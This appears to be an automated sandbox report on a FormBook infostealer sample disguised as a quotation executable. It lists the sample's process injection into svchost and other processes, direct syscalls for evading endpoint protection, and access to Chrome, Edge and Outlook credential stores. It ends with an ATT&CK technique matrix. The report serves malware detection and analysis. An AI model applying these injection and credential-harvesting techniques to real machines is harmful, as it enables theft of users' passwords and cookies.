Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B488F mov eax, dword ptr fs:[00000030h]	2_2_038B488F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856882 mov eax, dword ptr fs:[00000030h]	2_2_03856882
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856882 mov eax, dword ptr fs:[00000030h]	2_2_03856882
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856882 mov eax, dword ptr fs:[00000030h]	2_2_03856882
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387088E mov eax, dword ptr fs:[00000030h]	2_2_0387088E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387088E mov edx, dword ptr fs:[00000030h]	2_2_0387088E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387088E mov eax, dword ptr fs:[00000030h]	2_2_0387088E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E8890 mov eax, dword ptr fs:[00000030h]	2_2_038E8890
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E8890 mov eax, dword ptr fs:[00000030h]	2_2_038E8890
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038428C0 mov eax, dword ptr fs:[00000030h]	2_2_038428C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038428C0 mov eax, dword ptr fs:[00000030h]	2_2_038428C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038428C0 mov eax, dword ptr fs:[00000030h]	2_2_038428C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038428C0 mov eax, dword ptr fs:[00000030h]	2_2_038428C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038428C0 mov eax, dword ptr fs:[00000030h]	2_2_038428C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038428C0 mov eax, dword ptr fs:[00000030h]	2_2_038428C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038428C0 mov eax, dword ptr fs:[00000030h]	2_2_038428C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038428C0 mov eax, dword ptr fs:[00000030h]	2_2_038428C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038428C0 mov eax, dword ptr fs:[00000030h]	2_2_038428C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038428C0 mov eax, dword ptr fs:[00000030h]	2_2_038428C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038428C0 mov eax, dword ptr fs:[00000030h]	2_2_038428C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038428C0 mov eax, dword ptr fs:[00000030h]	2_2_038428C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038428C0 mov eax, dword ptr fs:[00000030h]	2_2_038428C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038288C8 mov eax, dword ptr fs:[00000030h]	2_2_038288C8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038288C8 mov eax, dword ptr fs:[00000030h]	2_2_038288C8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038308CD mov eax, dword ptr fs:[00000030h]	2_2_038308CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038308CD mov eax, dword ptr fs:[00000030h]	2_2_038308CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A8F0 mov eax, dword ptr fs:[00000030h]	2_2_0383A8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A8F0 mov eax, dword ptr fs:[00000030h]	2_2_0383A8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A8F0 mov eax, dword ptr fs:[00000030h]	2_2_0383A8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A8F0 mov eax, dword ptr fs:[00000030h]	2_2_0383A8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A8F0 mov eax, dword ptr fs:[00000030h]	2_2_0383A8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A8F0 mov eax, dword ptr fs:[00000030h]	2_2_0383A8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038648F0 mov eax, dword ptr fs:[00000030h]	2_2_038648F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C88FB mov eax, dword ptr fs:[00000030h]	2_2_038C88FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C819 mov eax, dword ptr fs:[00000030h]	2_2_0386C819
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C819 mov eax, dword ptr fs:[00000030h]	2_2_0386C819
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0835 mov eax, dword ptr fs:[00000030h]	2_2_038E0835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0835 mov eax, dword ptr fs:[00000030h]	2_2_038E0835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0835 mov eax, dword ptr fs:[00000030h]	2_2_038E0835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0835 mov eax, dword ptr fs:[00000030h]	2_2_038E0835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0835 mov eax, dword ptr fs:[00000030h]	2_2_038E0835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0835 mov eax, dword ptr fs:[00000030h]	2_2_038E0835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0835 mov eax, dword ptr fs:[00000030h]	2_2_038E0835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0835 mov eax, dword ptr fs:[00000030h]	2_2_038E0835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0835 mov eax, dword ptr fs:[00000030h]	2_2_038E0835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0835 mov eax, dword ptr fs:[00000030h]	2_2_038E0835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0835 mov eax, dword ptr fs:[00000030h]	2_2_038E0835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0835 mov eax, dword ptr fs:[00000030h]	2_2_038E0835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0835 mov eax, dword ptr fs:[00000030h]	2_2_038E0835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC870 mov eax, dword ptr fs:[00000030h]	2_2_038BC870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B8F8B mov eax, dword ptr fs:[00000030h]	2_2_038B8F8B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B8F8B mov eax, dword ptr fs:[00000030h]	2_2_038B8F8B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B8F8B mov eax, dword ptr fs:[00000030h]	2_2_038B8F8B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840F90 mov eax, dword ptr fs:[00000030h]	2_2_03840F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840F90 mov ecx, dword ptr fs:[00000030h]	2_2_03840F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840F90 mov eax, dword ptr fs:[00000030h]	2_2_03840F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840F90 mov eax, dword ptr fs:[00000030h]	2_2_03840F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840F90 mov eax, dword ptr fs:[00000030h]	2_2_03840F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840F90 mov eax, dword ptr fs:[00000030h]	2_2_03840F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840F90 mov eax, dword ptr fs:[00000030h]	2_2_03840F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840F90 mov eax, dword ptr fs:[00000030h]	2_2_03840F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840F90 mov eax, dword ptr fs:[00000030h]	2_2_03840F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840F90 mov eax, dword ptr fs:[00000030h]	2_2_03840F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840F90 mov eax, dword ptr fs:[00000030h]	2_2_03840F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840F90 mov eax, dword ptr fs:[00000030h]	2_2_03840F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840F90 mov eax, dword ptr fs:[00000030h]	2_2_03840F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834FB6 mov eax, dword ptr fs:[00000030h]	2_2_03834FB6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385CFB0 mov eax, dword ptr fs:[00000030h]	2_2_0385CFB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385CFB0 mov eax, dword ptr fs:[00000030h]	2_2_0385CFB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868FBC mov eax, dword ptr fs:[00000030h]	2_2_03868FBC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EEFD3 mov eax, dword ptr fs:[00000030h]	2_2_038EEFD3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DAFD0 mov eax, dword ptr fs:[00000030h]	2_2_038DAFD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DAFD0 mov eax, dword ptr fs:[00000030h]	2_2_038DAFD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DAFD0 mov eax, dword ptr fs:[00000030h]	2_2_038DAFD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DAFD0 mov eax, dword ptr fs:[00000030h]	2_2_038DAFD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03846FE0 mov eax, dword ptr fs:[00000030h]	2_2_03846FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03846FE0 mov ecx, dword ptr fs:[00000030h]	2_2_03846FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03846FE0 mov ecx, dword ptr fs:[00000030h]	2_2_03846FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03846FE0 mov eax, dword ptr fs:[00000030h]	2_2_03846FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03846FE0 mov ecx, dword ptr fs:[00000030h]	2_2_03846FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03846FE0 mov ecx, dword ptr fs:[00000030h]	2_2_03846FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03846FE0 mov eax, dword ptr fs:[00000030h]	2_2_03846FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03846FE0 mov eax, dword ptr fs:[00000030h]	2_2_03846FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03846FE0 mov eax, dword ptr fs:[00000030h]	2_2_03846FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03846FE0 mov eax, dword ptr fs:[00000030h]	2_2_03846FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03846FE0 mov eax, dword ptr fs:[00000030h]	2_2_03846FE0

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_004E0B62

Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004B2622
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004A083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004A083F
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004A09D5 SetUnhandledExceptionFilter,	0_2_004A09D5
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004A0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_004A0C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtQueryInformationToken: Direct from: 0x64DDBF	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtTerminateThread: Direct from: 0x7FFAC6662651	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDeviceIoControlFile: Direct from: 0x64E4B5	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x5E12CAE	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDeviceIoControlFile: Direct from: 0x65556C	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDeviceIoControlFile: Direct from: 0x64E471	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x64E386	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDeviceIoControlFile: Direct from: 0x64E442	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtQuerySystemInformation: Direct from: 0x6554BD	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDeviceIoControlFile: Direct from: 0x655614	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtCreateThreadEx: Direct from: 0x64CA5F	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtResumeThread: Direct from: 0x5E12EE0	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x64D662	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x64C215	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtProtectVirtualMemory: Direct from: 0x5E1AA09	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtProtectVirtualMemory: Direct from: 0x655421	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x5E12E6F	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtProtectVirtualMemory: Direct from: 0x656AA4	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtAllocateVirtualMemory: Direct from: 0x659226	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtClose: Direct from: 0x6556B2

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmdkey.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 7360	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Thread register set: target process: 7360	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Thread register set: target process: 2484	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe

Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2DBD008

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

0_2_004E1201

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004C2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_004C2BA5

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004EB226 SendInput,keybd_event,

0_2_004EB226

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_005022DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_005022DA

Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QUOTATION#050125.exe"	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

0_2_004E0B62

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004E1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_004E1663

Source: QUOTATION#050125.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RAVCpl64.exe, 00000004.00000000.2567083351.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.7112253225.0000000000EA1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: QUOTATION#050125.exe, RAVCpl64.exe, 00000004.00000000.2567083351.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.7112253225.0000000000EA1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: RAVCpl64.exe, 00000004.00000000.2567083351.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.7112253225.0000000000EA1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: RAVCpl64.exe, 00000004.00000000.2567083351.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.7112253225.0000000000EA1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004A0698 cpuid

0_2_004A0698

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004F8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_004F8195

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004DD27A GetUserNameW,

0_2_004DD27A

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004BB952 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_004BB952

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004842DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2649523005.0000000009250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.6080645951.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.6080568851.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2635210550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\cmdkey.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\cmdkey.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: QUOTATION#050125.exe	Binary or memory string: WIN_81
Source: QUOTATION#050125.exe	Binary or memory string: WIN_XP
Source: QUOTATION#050125.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: QUOTATION#050125.exe	Binary or memory string: WIN_XPe
Source: QUOTATION#050125.exe	Binary or memory string: WIN_VISTA
Source: QUOTATION#050125.exe	Binary or memory string: WIN_7
Source: QUOTATION#050125.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2649523005.0000000009250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.6080645951.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.6080568851.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2635210550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_00501204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00501204
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_00501806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00501806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
